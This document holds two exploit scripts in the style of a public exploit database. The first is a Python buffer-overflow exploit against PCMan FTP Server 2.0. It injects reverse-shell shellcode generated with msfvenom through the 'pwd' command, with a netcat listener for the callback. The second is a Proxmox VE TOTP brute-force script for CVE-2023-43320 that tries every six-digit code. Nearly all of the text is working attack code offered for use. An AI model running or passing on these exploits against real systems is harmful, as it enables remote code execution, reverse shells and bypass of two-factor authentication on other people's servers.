<pre><code># Exploit Title: PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow # Date: 09/25/2023 # Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN) # Vendor Homepage: http://pcman.openfoundry.org/ # Software Link: https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # Version: 2.0 # Tested on: Windows XP SP3 #!/usr/bin/python import socket #buffer = 'A' * 2500 #offset = 2007 #badchars=\x00\x0a\x0d #return_address=0x7e429353 (USER32.dll) #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.130 LPORT=4444 EXITFUNC=thread -f c -b "\x00\x0a\x0d" #nc -nvlp 4444 overflow = ( "\xdb\xce\xd9\x74\x24\xf4\xba\xc1\x93\x3a\xcc\x58\x31\xc9" "\xb1\x52\x31\x50\x17\x03\x50\x17\x83\x01\x97\xd8\x39\x7d" "\x70\x9e\xc2\x7d\x81\xff\x4b\x98\xb0\x3f\x2f\xe9\xe3\x8f" "\x3b\xbf\x0f\x7b\x69\x2b\x9b\x09\xa6\x5c\x2c\xa7\x90\x53" "\xad\x94\xe1\xf2\x2d\xe7\x35\xd4\x0c\x28\x48\x15\x48\x55" "\xa1\x47\x01\x11\x14\x77\x26\x6f\xa5\xfc\x74\x61\xad\xe1" "\xcd\x80\x9c\xb4\x46\xdb\x3e\x37\x8a\x57\x77\x2f\xcf\x52" "\xc1\xc4\x3b\x28\xd0\x0c\x72\xd1\x7f\x71\xba\x20\x81\xb6" "\x7d\xdb\xf4\xce\x7d\x66\x0f\x15\xff\xbc\x9a\x8d\xa7\x37" "\x3c\x69\x59\x9b\xdb\xfa\x55\x50\xaf\xa4\x79\x67\x7c\xdf" "\x86\xec\x83\x0f\x0f\xb6\xa7\x8b\x4b\x6c\xc9\x8a\x31\xc3" "\xf6\xcc\x99\xbc\x52\x87\x34\xa8\xee\xca\x50\x1d\xc3\xf4" "\xa0\x09\x54\x87\x92\x96\xce\x0f\x9f\x5f\xc9\xc8\xe0\x75" "\xad\x46\x1f\x76\xce\x4f\xe4\x22\x9e\xe7\xcd\x4a\x75\xf7" "\xf2\x9e\xda\xa7\x5c\x71\x9b\x17\x1d\x21\x73\x7d\x92\x1e" "\x63\x7e\x78\x37\x0e\x85\xeb\xf8\x67\x17\x6d\x90\x75\x17" "\x63\x3d\xf3\xf1\xe9\xad\x55\xaa\x85\x54\xfc\x20\x37\x98" "\x2a\x4d\x77\x12\xd9\xb2\x36\xd3\x94\xa0\xaf\x13\xe3\x9a" "\x66\x2b\xd9\xb2\xe5\xbe\x86\x42\x63\xa3\x10\x15\x24\x15" "\x69\xf3\xd8\x0c\xc3\xe1\x20\xc8\x2c\xa1\xfe\x29\xb2\x28" "\x72\x15\x90\x3a\x4a\x96\x9c\x6e\x02\xc1\x4a\xd8\xe4\xbb" "\x3c\xb2\xbe\x10\x97\x52\x46\x5b\x28\x24\x47\xb6\xde\xc8" "\xf6\x6f\xa7\xf7\x37\xf8\x2f\x80\x25\x98\xd0\x5b\xee\xb8" "\x32\x49\x1b\x51\xeb\x18\xa6\x3c\x0c\xf7\xe5\x38\x8f\xfd" "\x95\xbe\x8f\x74\x93\xfb\x17\x65\xe9\x94\xfd\x89\x5e\x94" "\xd7") shellcode = 'A' * 2007 + "\x53\x93\x42\x7e" + "\x90" * 32 + overflow # Change IP/Port as required s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: print "\nSending evil buffer..." s.connect(('192.168.146.135',21)) data = s.recv(1024) s.send('USER anonymous' +'\r\n') data = s.recv(1024) s.send('PASS anonymous\r\n') s.send('pwd ' + shellcode + '\r\n') s.close() print "\nExploit completed successfully!." except: print "Could not connect to FTP!" </code></pre>

<pre><code># Exploit Title: Proxmox VE TOTP Brute Force # Date: 09/23/2023 # Exploit Author: Cory Cline, Gabe Rust # Vendor Homepage: https://www.proxmox.com/en/ # Software Link: http://download.proxmox.com/iso/ # Version: 5.4 - 7.4-1 # Tested on: Debian # CVE : CVE-2023-43320 import time import requests import urllib.parse import json import os import urllib3 urllib3.disable_warnings() threads=25 #################### REPLACE THESE VALUES ######################### password="KNOWN PASSWORD HERE" username="KNOWN USERNAME HERE" target_url="https://HOST:PORT" ################################################################## ticket="" ticket_username="" CSRFPreventionToken="" ticket_data={} auto_refresh_time = 20 # in minutes - 30 minutes before expiration last_refresh_time = 0 tokens = []; for num in range(0,1000000): tokens.append(str(num).zfill(6)) def refresh_ticket(target_url, username, password): global CSRFPreventionToken global ticket_username global ticket_data refresh_ticket_url = target_url + "/api2/extjs/access/ticket" refresh_ticket_cookies = {} refresh_ticket_headers = {} refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"} ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text) ticket_data = json.loads(ticket_data_raw) CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"] ticket_username = ticket_data["data"]["username"] def attack(token): global last_refresh_time global auto_refresh_time global target_url global username global password global ticket_username global ticket_data if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ): refresh_ticket(target_url, username, password) last_refresh_time = int(time.time()) url = target_url + "/api2/extjs/access/ticket" cookies = {} headers = {"Csrfpreventiontoken": CSRFPreventionToken} stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1] stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A') data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)} response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False) if(len(response.text) > 350): print(response.text) os._exit(1) while(1): refresh_ticket(target_url, username, password) last_refresh_time = int(time.time()) with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor: res = [executor.submit(attack, token) for token in tokens] concurrent.futures.wait(res) </code></pre>